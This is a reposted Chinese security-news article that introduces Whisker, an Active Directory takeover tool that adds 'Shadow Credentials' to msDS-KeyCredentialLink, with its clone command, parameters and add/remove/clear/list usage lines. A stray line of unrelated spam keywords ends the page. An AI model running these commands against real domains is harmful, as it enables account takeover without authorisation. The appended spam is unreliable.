如何使用Whisker接管活動(dòng)目錄用戶或計(jì)算機(jī)賬號(hào)

作者：Alpha_h4ck 2021-09-13 09:23:38

Whisker是一款基于C#開發(fā)的工具，可以通過篡改目標(biāo)賬號(hào)的msDS-KeyCredentialLink或添加“Shadow Credentials”來實(shí)現(xiàn)活動(dòng)目錄用戶或計(jì)算機(jī)賬號(hào)的接管。

該工具主要基于DSInternals項(xiàng)目代碼實(shí)現(xiàn)其功能。

為了保證攻擊能夠成功，環(huán)境必須為運(yùn)行了最新版本W(wǎng)indows Server 2016的域控制器，而且域控制器必須擁有一個(gè)服務(wù)器認(rèn)證證書以支持PKINIT Kerberos認(rèn)證。

廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地，并進(jìn)行代碼構(gòu)建：

git clone https://github.com/eladshamir/Whisker.git

向目標(biāo)對(duì)象的msDS-KeyCredentialLink屬性添加一個(gè)新的值：

使用樣例：

Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1

從目標(biāo)對(duì)象的msDS-KeyCredentialLink屬性移除一個(gè)值：

/target:：必須。設(shè)置目標(biāo)名稱，計(jì)算機(jī)對(duì)象必須以“$”結(jié)尾。
/deviceID:: 必須。設(shè)置目標(biāo)對(duì)象msDS-KeyCredentialLink屬性待移除值的DeviceID，必須是一個(gè)有效的GUID。
/domain:: 可選。設(shè)置目標(biāo)全限定域名(FQDN)，如果不提供該值，工具將會(huì)嘗試解析當(dāng)前用戶的FQDN。
/dc:：可選。設(shè)置目標(biāo)域控制器(DC)，如果不提供該值，工具將會(huì)嘗試攻擊主域控制器(PDC)。

使用樣例：

Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b

清除目標(biāo)對(duì)象msDS-KeyCredentialLink屬性的所有值：

使用樣例：

Whisker.exe clear /target:computername$ /domain:constoso.local /dc:dc1.contoso.local

輸出目標(biāo)對(duì)象msDS-KeyCredentialLink屬性的所有值：

使用樣例：

Whisker.exe list /target:computername$ /domain:constoso.local /dc:dc1.contoso.local

Whisker：【GitHub傳送門】

責(zé)任編輯：趙寧寧來源： FreeBuf

自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡